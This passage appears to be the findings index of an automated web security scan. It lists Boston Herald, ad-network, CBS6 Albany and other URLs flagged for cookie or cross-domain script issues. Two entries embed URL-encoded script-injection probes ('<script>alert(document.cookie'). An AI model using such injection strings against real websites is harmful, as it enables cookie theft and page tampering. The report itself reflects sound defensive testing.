17.233. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

17.234. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

17.235. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.236. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

17.237. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.238. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.239. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

17.240. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.241. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

17.242. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

17.243. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.244. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

17.245. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

17.246. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

17.247. http://pixel.invitemedia.com/rubicon_sync

17.248. http://pixel.invitemedia.com/rubicon_sync

17.249. http://scores.heraldinteractive.com/merge/tsnform.aspx

17.250. http://smm.sitescout.com/disp

17.251. http://smm.sitescout.com/disp

17.252. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

17.253. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

17.254. http://twitter.com/

17.255. http://twitter.com/malsup

17.256. http://twitter.com/malsup

17.257. http://twitter.com/search

17.258. http://twitter.com/search

17.259. http://twitter.com/search

17.260. http://twitter.com/share

17.261. http://www.addthis.com/bookmark.php

17.262. http://www.berkshireeagle.com/portlet/weather/html/process_mode.jsp

17.263. http://www.bostonherald.com/

17.264. http://www.bostonherald.com/blogs/sports/rap_sheet/

17.265. http://www.bostonherald.com/business/

17.266. http://www.bostonherald.com/business/general/

17.267. http://www.bostonherald.com/business/general/view.bg

17.268. http://www.bostonherald.com/entertainment/

17.269. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

17.270. http://www.bostonherald.com/galleries/index.php

17.271. http://www.bostonherald.com/homepage.bg

17.272. http://www.bostonherald.com/index.bg

17.273. http://www.bostonherald.com/jobfind/

17.274. http://www.bostonherald.com/mediacenter/index.php

17.275. http://www.bostonherald.com/mediacenter/video.php

17.276. http://www.bostonherald.com/mediacenter/video.php

17.277. http://www.bostonherald.com/news/

17.278. http://www.bostonherald.com/news/columnists/

17.279. http://www.bostonherald.com/news/columnists/view.bg

17.280. http://www.bostonherald.com/news/international/africa/view.bg

17.281. http://www.bostonherald.com/news/national/general/view.bg

17.282. http://www.bostonherald.com/news/offbeat/

17.283. http://www.bostonherald.com/news/politics/

17.284. http://www.bostonherald.com/news/politics/view.bg

17.285. http://www.bostonherald.com/news/politics/view.bg

17.286. http://www.bostonherald.com/news/politics/view.bg

17.287. http://www.bostonherald.com/news/regional/

17.288. http://www.bostonherald.com/news/regional/view.bg

17.289. http://www.bostonherald.com/news/regional/view.bg

17.290. http://www.bostonherald.com/news/regional/view.bg

17.291. http://www.bostonherald.com/news/regional/view.bg

17.292. http://www.bostonherald.com/photobox/index.bg

17.293. http://www.bostonherald.com/projects/mcas2009

17.294. http://www.bostonherald.com/projects/your_tax_dollars.bg

17.295. http://www.bostonherald.com/search/

17.296. http://www.bostonherald.com/search/

17.297. http://www.bostonherald.com/search/

17.298. http://www.bostonherald.com/search/

17.299. http://www.bostonherald.com/search/

17.300. http://www.bostonherald.com/sports/football/patriots/view.bg

17.301. http://www.bostonherald.com/sports/football/patriots/view.bg

17.302. http://www.bostonherald.com/track/

17.303. http://www.bostonherald.com/track/celebrity/

17.304. http://www.bostonherald.com/track/celebrity/view.bg

17.305. http://www.bostonherald.com/track/inside_track/

17.306. http://www.bostonherald.com/track/inside_track/view.bg

17.307. http://www.bostonherald.com/track/star_tracks/

17.308. http://www.bostonherald.com/track/star_tracks/view.bg

17.309. http://www.bostonherald.com/users/register

17.310. http://www.cbs6albany.com/common/archives/

17.311. http://www.cbs6albany.com/common/archives/

17.312. http://www.cbs6albany.com/common/tools/load.php

17.313. http://www.cbs6albany.com/sections/thirdParty/iframe_header/

17.314. http://www.moxiesoft.com/search.aspx

17.315. http://www.moxiesoft.com/tal_lp/campaign.aspx

17.316. http://www.moxiesoft.com/tal_lp/default.aspx

17.317. http://www.moxiesoft.com/tal_news/press_release.aspx

17.318. http://www.moxiesoft.com/tal_news/webinars/default.aspx

17.319. http://www.moxiesoft.com/tal_products/chat.aspx

17.320. http://www.moxiesoft.com/tal_products/chat_tour2.aspx

17.321. http://www.moxiesoft.com/tal_resources/content.aspx

17.322. https://www.paperg.com/post.php

17.323. http://www.soundingsonline.com/component/chronocontact/

17.324. http://www.soundingsonline.com/index.php

17.325. http://www.soundingsonline.com/index.php

17.326. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

17.327. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.328. http://www.zvents.com/

17.329. http://xads.zedo.com/ads2/c

18. Cross-domain script include

18.1. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

18.2. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

18.3. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

18.4. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

18.5. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

18.6. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

18.7. http://ad.afy11.net/ad

18.8. http://ad.afy11.net/ad

18.9. http://ad.afy11.net/ad

18.10. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

18.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

18.12. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

18.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

18.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

18.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

18.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

18.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

18.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

18.19. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

18.20. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

18.21. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

18.22. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

18.23. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

18.24. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

18.25. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

18.26. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

18.27. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

18.28. http://ad.turn.com/server/ads.js

18.29. http://ad.turn.com/server/ads.js

18.30. http://ad.turn.com/server/ads.js

18.31. http://ad.turn.com/server/ads.js

18.32. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

18.33. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

18.34. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

18.35. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

18.36. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

18.37. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

18.38. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

18.39. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

18.40. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

18.41. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

18.42. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

18.43. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

18.44. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

18.45. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

18.46. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

18.47. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

18.48. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

18.49. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

18.50. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

18.51. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

18.52. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

18.53. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

18.54. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

18.55. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

18.56. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

18.57. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

18.58. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

18.59. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

18.60. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

18.61. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

18.62. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

18.63. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

18.64. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

18.65. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

18.66. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

18.67. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

18.68. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

18.69. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

18.70. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

18.71. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

18.72. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

18.73. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

18.74. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

18.75. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

18.76. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

18.77. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

18.78. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

18.79. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

18.80. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

18.81. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

18.82. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

18.83. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

18.84. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

18.85. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

18.86. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

18.87. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

18.88. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

18.89. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

18.90. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

18.91. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

18.92. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

18.93. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

18.94. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

18.95. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

18.96. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

18.97. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

18.98. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

18.99. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

18.100. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

18.101. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

18.102. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

18.103. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

18.104. https://base.liveperson.net/hc/5296924/

18.105. http://bh.heraldinteractive.com/includes/processAds.bg

18.106. http://bh.heraldinteractive.com/includes/processAds.bg

18.107. http://bh.heraldinteractive.com/includes/processAds.bg

18.108. http://bh.heraldinteractive.com/includes/processAds.bg

18.109. http://bh.heraldinteractive.com/includes/processAds.bg

18.110. http://bh.heraldinteractive.com/includes/processAds.bg

18.111. http://boston30.autochooser.com/results.asp

18.112. http://bostonherald.com/blogs/entertainment/the_assistant/

18.113. http://bostonherald.com/blogs/lifestyle/fork_lift/

18.114. http://bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/

18.115. http://bostonherald.com/news/document.bg

18.116. http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

18.117. http://bostonherald.com/news/regional/view/20110128copsgrannyattacksrobber/

18.118. http://bostonherald.com/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/

18.119. http://bostonherald.com/projects/your_tax_dollars.bg

18.120. http://bostonherald.com/search/

18.121. http://bostonherald.com/sports/football/patriots/view.bg

18.122. http://bostonherald.com/track/inside_track/

18.123. http://bostonherald.com/track/inside_track/view.bg

18.124. http://bostonherald.com/track/star_tracks/

18.125. http://bostonherald.com/track/star_tracks/view.bg

18.126. http://bostonherald.com/users/login

18.127. http://bostonherald.com/users/register/

18.128. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

18.129. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

18.130. http://common.onset.freedom.com/images/arrow_next.gif/

18.131. http://common.onset.freedom.com/images/arrow_prev.gif/

18.132. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

18.133. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

18.134. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

18.135. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

18.136. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

18.137. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

18.138. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

18.139. http://digg.com/submit

18.140. http://events.cbs6albany.com/

18.141. http://events.cbs6albany.com/%3F376e5%2522%253E%253Cscript%253Ealert(1

18.142. http://events.cbs6albany.com/%3F376e5%2522%253E%253Cscript%253Ealert(document.cookie

18.143. http://events.cbs6albany.com/albany-ny/events

18.144. http://events.cbs6albany.com/albany-ny/events/arts+crafts

18.145. http://events.cbs6albany.com/albany-ny/events/business+tech

18.146. http://events.cbs6albany.com/albany-ny/events/comedy

18.147. http://events.cbs6albany.com/albany-ny/events/community

18.148. http://events.cbs6albany.com/albany-ny/events/dance

18.149. http://events.cbs6albany.com/albany-ny/events/education+campus

18.150. http://events.cbs6albany.com/albany-ny/events/fairs+festivals

18.151. http://events.cbs6albany.com/albany-ny/events/food+dining

18.152. http://events.cbs6albany.com/albany-ny/events/music

18.153. http://events.cbs6albany.com/albany-ny/events/other

18.154. http://events.cbs6albany.com/albany-ny/events/performing+arts

18.155. http://events.cbs6albany.com/albany-ny/events/shopping

18.156. http://events.cbs6albany.com/albany-ny/events/show/139733045-pink-floyd-experience

18.157. http://events.cbs6albany.com/albany-ny/events/show/142549185-lisa-lampanelli

18.158. http://events.cbs6albany.com/albany-ny/events/show/147270025-glenn-beck

18.159. http://events.cbs6albany.com/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb

18.160. http://events.cbs6albany.com/albany-ny/events/show/151637365-riverdance

18.161. http://events.cbs6albany.com/albany-ny/events/show/152086945-harlem-globetrotters

18.162. http://events.cbs6albany.com/albany-ny/events/show/154912025-mike-epps-and-friends

18.163. http://events.cbs6albany.com/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour

18.164. http://events.cbs6albany.com/albany-ny/events/show/155300665-celtic-woman

18.165. http://events.cbs6albany.com/albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab

18.166. http://events.cbs6albany.com/albany-ny/events/show/162869785-a-conversation-with-steve-martin

18.167. http://events.cbs6albany.com/albany-ny/events/show/163514785-2011-valentine-expo

18.168. http://events.cbs6albany.com/albany-ny/events/show/163938585-the-joy-formidable

18.169. http://events.cbs6albany.com/albany-ny/events/sports+outdoors

18.170. http://events.cbs6albany.com/albany-ny/events/visual+arts

18.171. http://events.cbs6albany.com/albany-ny/movies

18.172. http://events.cbs6albany.com/albany-ny/performers

18.173. http://events.cbs6albany.com/albany-ny/restaurants

18.174. http://events.cbs6albany.com/albany-ny/tickets

18.175. http://events.cbs6albany.com/albany-ny/venues

18.176. http://events.cbs6albany.com/albany-ny/venues/show/182888-the-egg

18.177. http://events.cbs6albany.com/albany-ny/venues/show/42778-regal-crossgates-mall-stadium-18

18.178. http://events.cbs6albany.com/albany-ny/venues/show/47192-palace-theatre

18.179. http://events.cbs6albany.com/albany-ny/venues/show/932464-times-union-center

18.180. http://events.cbs6albany.com/clifton-park-ny/events/show/164180885-mac-miller

18.181. http://events.cbs6albany.com/clifton-park-ny/events/show/164348085-bring-me-the-horizon

18.182. http://events.cbs6albany.com/clifton-park-ny/venues/show/11456-northern-lights

18.183. http://events.cbs6albany.com/glens-falls-ny/events/show/164377145-tna-wrestling-live

18.184. http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center

18.185. http://events.cbs6albany.com/menands-ny/events/show/163979825-sweetheart-breakfast

18.186. http://events.cbs6albany.com/movies

18.187. http://events.cbs6albany.com/movies/show/261885-127-hours

18.188. http://events.cbs6albany.com/movies/show/272945-black-swan

18.189. http://events.cbs6albany.com/movies/show/299065-the-kings-speech

18.190. http://events.cbs6albany.com/movies/show/324545-true-grit

18.191. http://events.cbs6albany.com/movies/show/344645-no-strings-attached

18.192. http://events.cbs6albany.com/movies/show/346845-sanctum-3d

18.193. http://events.cbs6albany.com/movies/show/354805-sanctum

18.194. http://events.cbs6albany.com/norfolk-ct/events/show/164346445-big-shot

18.195. http://events.cbs6albany.com/norfolk-ct/events/show/164346985-bo-bice

18.196. http://events.cbs6albany.com/norfolk-ct/events/show/164347045-classic-albums-live-performs-led-zeppelins-houses-of-the-holy

18.197. http://events.cbs6albany.com/norfolk-ct/venues/show/1102846-infinity-music-hall-and-bistro

18.198. http://events.cbs6albany.com/pittsfield-ma/events/show/160788005-lover-youre-killin-me

18.199. http://events.cbs6albany.com/saratoga-springs-ny/events/show/163979845-intimate-encounters-for-valentines

18.200. http://events.cbs6albany.com/schenectady-ny/events/show/163204745-be-my-valentine

18.201. http://events.cbs6albany.com/search

18.202. http://events.cbs6albany.com/support/contact

18.203. http://events.cbs6albany.com/support/content_guidelines

18.204. http://events.cbs6albany.com/support/help

18.205. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

18.206. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

18.207. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

18.208. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

18.209. http://jqueryui.com/about

18.210. http://jqueryui.com/themeroller/

18.211. http://local.nissanusa.com/albany-schenectady-troy-ny-area

18.212. http://local.nissanusa.com/albuquerque-santa-fe-area

18.213. http://local.nissanusa.com/atlanta-area

18.214. http://local.nissanusa.com/austin-area

18.215. http://local.nissanusa.com/baltimore-area

18.216. http://local.nissanusa.com/boston-area

18.217. http://local.nissanusa.com/chicago-area

18.218. http://local.nissanusa.com/cincinnati-area

18.219. http://local.nissanusa.com/cleveland-area

18.220. http://local.nissanusa.com/columbus-oh-area

18.221. http://local.nissanusa.com/dallas-ft-worth-area

18.222. http://local.nissanusa.com/denver-area

18.223. http://local.nissanusa.com/harlingen-brownsville-tx-area

18.224. http://local.nissanusa.com/harrisburg-lancaster-pa-area

18.225. http://local.nissanusa.com/hartford-new-haven-ct-area

18.226. http://local.nissanusa.com/honolulu-area

18.227. http://local.nissanusa.com/houston-area

18.228. http://local.nissanusa.com/indianapolis-area

18.229. http://local.nissanusa.com/jacksonville-area

18.230. http://local.nissanusa.com/las-vegas-area

18.231. http://local.nissanusa.com/little-rock-pine-bluff-ar-area

18.232. http://local.nissanusa.com/los-angeles-area

18.233. http://local.nissanusa.com/louisville-area

18.234. http://local.nissanusa.com/miami-area

18.235. http://local.nissanusa.com/milwaukee-area

18.236. http://local.nissanusa.com/minneapolis-area

18.237. http://local.nissanusa.com/nashville-area

18.238. http://local.nissanusa.com/new-orleans-area

18.239. http://local.nissanusa.com/new-york-area

18.240. http://local.nissanusa.com/norfolk-portsmouth-newport-news-area

18.241. http://local.nissanusa.com/oklahoma-city-area

18.242. http://local.nissanusa.com/orlando-area

18.243. http://local.nissanusa.com/philadelphia-area

18.244. http://local.nissanusa.com/phoenix-area

18.245. http://local.nissanusa.com/pittsburgh-area

18.246. http://local.nissanusa.com/portland-or-area

18.247. http://local.nissanusa.com/providence-new-bedford-area

18.248. http://local.nissanusa.com/sacramento-area

18.249. http://local.nissanusa.com/salt-lake-city-area

18.250. http://local.nissanusa.com/san-antonio-area

18.251. http://local.nissanusa.com/san-diego-area

18.252. http://local.nissanusa.com/san-francisco-oakland-san-jose-area

18.253. http://local.nissanusa.com/seattle-tacoma-area

18.254. http://local.nissanusa.com/st-louis-area

18.255. http://local.nissanusa.com/tampa-st-petersburg-area

18.256. http://local.nissanusa.com/washington-dc-area

18.257. http://local.nissanusa.com/wilkes-barre-scranton-pa-area

18.258. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

18.259. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

18.260. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

18.261. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

18.262. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

